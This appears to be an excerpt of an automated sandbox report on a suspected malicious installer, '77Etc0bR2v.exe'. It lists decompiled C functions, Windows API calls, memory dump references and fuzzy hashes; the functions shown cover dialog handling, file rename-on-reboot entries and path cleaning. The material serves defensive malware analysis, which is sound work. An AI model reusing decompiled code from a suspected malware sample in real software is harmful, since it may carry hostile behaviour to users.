                                                                                                                        0x00000000
                                                                                                                        0x00403b1d
                                                                                                                        0x00403b03
                                                                                                                        0x00403b0a
                                                                                                                        0x00403b10
                                                                                                                        0x00403b12
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b12
                                                                                                                        0x00403ace
                                                                                                                        0x00000000
                                                                                                                        0x00403aac
                                                                                                                        0x00403ab2
                                                                                                                        0x00403abc
                                                                                                                        0x00403ec2
                                                                                                                        0x00403ec8
                                                                                                                        0x00403ed5
                                                                                                                        0x00403edb
                                                                                                                        0x00403edb
                                                                                                                        0x00403ee5
                                                                                                                        0x00000000
                                                                                                                        0x00403ee5
                                                                                                                        0x00403aaa

                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                                                        • ShowWindow.USER32(?), ref: 00403A9E
                                                                                                                        • 73BC9840.USER32 ref: 00403AB2
                                                                                                                        • SetWindowLongA.USER32 ref: 00403ACE
                                                                                                                        • GetDlgItem.USER32 ref: 00403AEF
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B03
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                                                        • GetDlgItem.USER32 ref: 00403BB8
                                                                                                                        • GetDlgItem.USER32 ref: 00403BC2
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C2D
                                                                                                                        • GetDlgItem.USER32 ref: 00403CD3
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                                                        • EnableMenuItem.USER32 ref: 00403D3E
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D56
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D69
                                                                                                                        • lstrlen.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                                                        • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$C9840ClassEnabledSystemTextlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 792189959-0
                                                                                                                        • Opcode ID: 5a851e1acd7e9b2c041f37148ddca57ebdb4acb3e701dc7f2e55be9cac4cc860
                                                                                                                        • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                                                        • Opcode Fuzzy Hash: 5a851e1acd7e9b2c041f37148ddca57ebdb4acb3e701dc7f2e55be9cac4cc860
                                                                                                                        • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				long _t88;
				int _t97;
				struct HWND__* _t98;
				signed int _t99;
				intOrPtr _t108;
				int _t109;
				signed int* _t111;
				signed int _t112;
				char* _t113;
				void* _t114;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t109 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t109);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t109 = _a16;
						if( *((intOrPtr*)(_t109 + 8)) == 0x70b &&  *((intOrPtr*)(_t109 + 0xc)) == 0x201) {
							_t99 =  *((intOrPtr*)(_t109 + 0x1c));
							_t108 =  *((intOrPtr*)(_t109 + 0x18));
							_v12 = _t99;
							_v16 = _t108;
							_v8 = 0x422e40;
							if(_t99 - _t108 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t109 = _a16;
							}
						}
						if( *((intOrPtr*)(_t109 + 8)) != 0x700 ||  *((intOrPtr*)(_t109 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t109 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t109 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t111 =  *0x41fc70 + 0x14;
						if(( *_t111 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t111 =  *_t111 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t97 = _a16;
				_t112 =  *(_t97 + 0x30);
				if(_t112 < 0) {
					_t112 =  *( *0x42367c - 4 + _t112 * 4);
				}
				_push( *((intOrPtr*)(_t97 + 0x34)));
				_t113 = _t112 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t113;
				_v12 = _v12 & 0x00000000;
				_t114 = _t113 + 1;
				_v16 = _t114;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t97 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t97 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t97 + 0x14) & 0x00000001);
				_t98 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t98);
				SendMessageA(_t98, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t98, 0x443, 0, _t86);
				_t88 = SendMessageA(_t98, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				_push(_t114);
				L00405B7C();
				SendMessageA(_t98, 0x435, 0, _t88);
				SendMessageA(_t98, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}


















                                                                                                                        0x00404070
                                                                                                                        0x00404196
                                                                                                                        0x004041f2
                                                                                                                        0x004041f6
                                                                                                                        0x004042cd
                                                                                                                        0x004042cf
                                                                                                                        0x004042cf
                                                                                                                        0x004042d5
                                                                                                                        0x004042d5
                                                                                                                        0x004042d8
                                                                                                                        0x00000000
                                                                                                                        0x004042df
                                                                                                                        0x00404204
                                                                                                                        0x00404206
                                                                                                                        0x00404210
                                                                                                                        0x0040421b
                                                                                                                        0x0040421e
                                                                                                                        0x00404221
                                                                                                                        0x0040422c
                                                                                                                        0x0040422f
                                                                                                                        0x00404236
                                                                                                                        0x00404244
                                                                                                                        0x0040425c
                                                                                                                        0x00404264
                                                                                                                        0x0040426f
                                                                                                                        0x0040427f
                                                                                                                        0x00404281
                                                                                                                        0x00404281
                                                                                                                        0x00404236
                                                                                                                        0x0040428b
                                                                                                                        0x00000000
                                                                                                                        0x00404296
                                                                                                                        0x0040429a
                                                                                                                        0x004042ab
                                                                                                                        0x004042ab
                                                                                                                        0x004042b1
                                                                                                                        0x004042bf
                                                                                                                        0x004042bf
                                                                                                                        0x00000000
                                                                                                                        0x004042c3
                                                                                                                        0x0040428b
                                                                                                                        0x004041a1
                                                                                                                        0x00000000
                                                                                                                        0x004041b5
                                                                                                                        0x004041bb
                                                                                                                        0x004041c1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004041e6
                                                                                                                        0x004041e8
                                                                                                                        0x004041ed
                                                                                                                        0x00000000
                                                                                                                        0x004041ed
                                                                                                                        0x004041a1
                                                                                                                        0x00404076
                                                                                                                        0x00404079
                                                                                                                        0x0040407e
                                                                                                                        0x0040408f
                                                                                                                        0x0040408f
                                                                                                                        0x00404096
                                                                                                                        0x00404099
                                                                                                                        0x0040409b
                                                                                                                        0x004040a0
                                                                                                                        0x004040a9
                                                                                                                        0x004040af
                                                                                                                        0x004040bb
                                                                                                                        0x004040be
                                                                                                                        0x004040c7
                                                                                                                        0x004040cc
                                                                                                                        0x004040cf
                                                                                                                        0x004040d4
                                                                                                                        0x004040eb
                                                                                                                        0x004040f2
                                                                                                                        0x00404105
                                                                                                                        0x00404108
                                                                                                                        0x0040411d
                                                                                                                        0x00404124
                                                                                                                        0x00404129
                                                                                                                        0x0040412e
                                                                                                                        0x0040412e
                                                                                                                        0x0040413d
                                                                                                                        0x0040414c
                                                                                                                        0x0040414e
                                                                                                                        0x00404155
                                                                                                                        0x00404156
                                                                                                                        0x00404164
                                                                                                                        0x00404173
                                                                                                                        0x00404175
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
                                                                                                                        • GetDlgItem.USER32 ref: 004040FF
                                                                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                                        • GetSysColor.USER32(?), ref: 0040412E
                                                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                                        • lstrlen.KERNEL32(?), ref: 00404156
                                                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                                        • GetDlgItem.USER32 ref: 004041D6
                                                                                                                        • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                                        • GetDlgItem.USER32 ref: 00404204
                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                                        • LoadCursorA.USER32 ref: 00404253
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                                        • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                                        • LoadCursorA.USER32 ref: 0040427C
                                                                                                                        • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                        • String ID: @.B$N$open
                                                                                                                        • API String ID: 3615053054-3815657624
                                                                                                                        • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                        • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                                        • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                        • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							_push("[Rename]\r\n");
							if(E004057B2(_t25, _t51) != 0) {
								_push(0x409350);
								_t28 = E004057B2(_t26 + 0xa, _t26 + 0xa);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                                        0x004058ba
                                                                                                                        0x004058c1
                                                                                                                        0x004058c5
                                                                                                                        0x004058ce
                                                                                                                        0x004058d2
                                                                                                                        0x00405a11
                                                                                                                        0x00405a11
                                                                                                                        0x00000000
                                                                                                                        0x00405a11
                                                                                                                        0x004058d2
                                                                                                                        0x004058de
                                                                                                                        0x004058f4
                                                                                                                        0x0040591c
                                                                                                                        0x00405927
                                                                                                                        0x0040592b
                                                                                                                        0x0040594b
                                                                                                                        0x00405952
                                                                                                                        0x0040595c
                                                                                                                        0x00405969
                                                                                                                        0x0040596e
                                                                                                                        0x00405973
                                                                                                                        0x00405977
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405986
                                                                                                                        0x00405988
                                                                                                                        0x00405995
                                                                                                                        0x00405999
                                                                                                                        0x00405a0a
                                                                                                                        0x00405a0b
                                                                                                                        0x00000000
                                                                                                                        0x004059b5
                                                                                                                        0x004059b5
                                                                                                                        0x004059c2
                                                                                                                        0x00405a21
                                                                                                                        0x00405a27
                                                                                                                        0x00405a2e
                                                                                                                        0x004059d5
                                                                                                                        0x004059d5
                                                                                                                        0x004059d7
                                                                                                                        0x004059e0
                                                                                                                        0x004059eb
                                                                                                                        0x004059fd
                                                                                                                        0x00405a04
                                                                                                                        0x00000000
                                                                                                                        0x00405a04
                                                                                                                        0x00405a30
                                                                                                                        0x00405a31
                                                                                                                        0x00405a36
                                                                                                                        0x00405a38
                                                                                                                        0x00405a45
                                                                                                                        0x00405a45
                                                                                                                        0x00405a49
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405a3a
                                                                                                                        0x00405a3a
                                                                                                                        0x00405a3d
                                                                                                                        0x00405a40
                                                                                                                        0x00405a41
                                                                                                                        0x00000000
                                                                                                                        0x00405a3a
                                                                                                                        0x004059cd
                                                                                                                        0x004059d2
                                                                                                                        0x00000000
                                                                                                                        0x004059d2
                                                                                                                        0x00405999
                                                                                                                        0x004058f6
                                                                                                                        0x00405901
                                                                                                                        0x0040590a
                                                                                                                        0x0040590e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040590e
                                                                                                                        0x00405a1b

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                                        • wsprintfA.USER32 ref: 00405945
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                                        • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                          • Part of subcall function 004057B2: lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                        • String ID: %s=%s$0&B$[Rename]
                                                                                                                        • API String ID: 3772915668-951905037
                                                                                                                        • Opcode ID: 05dc510c935a9252d183404297d509aa55311242524adffaf7837e6f51b89b1c
                                                                                                                        • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                                        • Opcode Fuzzy Hash: 05dc510c935a9252d183404297d509aa55311242524adffaf7837e6f51b89b1c
                                                                                                                        • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                        0x00405dca
                                                                                                                        0x00405dd2
                                                                                                                        0x00405de6
                                                                                                                        0x00405de6
                                                                                                                        0x00405dec
                                                                                                                        0x00405df9
                                                                                                                        0x00405df9
                                                                                                                        0x00405dfa
                                                                                                                        0x00405dfc
                                                                                                                        0x00405e00
                                                                                                                        0x00405e02
                                                                                                                        0x00405e0b
                                                                                                                        0x00405e0d
                                                                                                                        0x00405e27
                                                                                                                        0x00405e2f
                                                                                                                        0x00405e2f
                                                                                                                        0x00405e34
                                                                                                                        0x00405e36
                                                                                                                        0x00405e38
                                                                                                                        0x00405e3c
                                                                                                                        0x00405e3d
                                                                                                                        0x00405e40
                                                                                                                        0x00405e48
                                                                                                                        0x00405e4a
                                                                                                                        0x00405e4e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405e54
                                                                                                                        0x00405e59
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405e59
                                                                                                                        0x00405e5e

                                                                                                                        APIs
                                                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                        • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                        • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 589700163-81923602
                                                                                                                        • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                        • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                                        • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                        • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                        0x00403f91
                                                                                                                        0x00404025
                                                                                                                        0x00000000
                                                                                                                        0x00404025
                                                                                                                        0x00403fa2
                                                                                                                        0x00403fa6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403fac
                                                                                                                        0x00403fb5
                                                                                                                        0x00403fb8
                                                                                                                        0x00403fb8
                                                                                                                        0x00403fbe
                                                                                                                        0x00403fc4
                                                                                                                        0x00403fc4
                                                                                                                        0x00403fd0
                                                                                                                        0x00403fd6
                                                                                                                        0x00403fdd
                                                                                                                        0x00403fe0
                                                                                                                        0x00403fe3
                                                                                                                        0x00403fe5
                                                                                                                        0x00403fe5
                                                                                                                        0x00403fed
                                                                                                                        0x00403ff3
                                                                                                                        0x00403ff3
                                                                                                                        0x00403ffd
                                                                                                                        0x00404002
                                                                                                                        0x00404005
                                                                                                                        0x0040400a
                                                                                                                        0x0040400d
                                                                                                                        0x0040400d
                                                                                                                        0x0040401d
                                                                                                                        0x0040401d
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
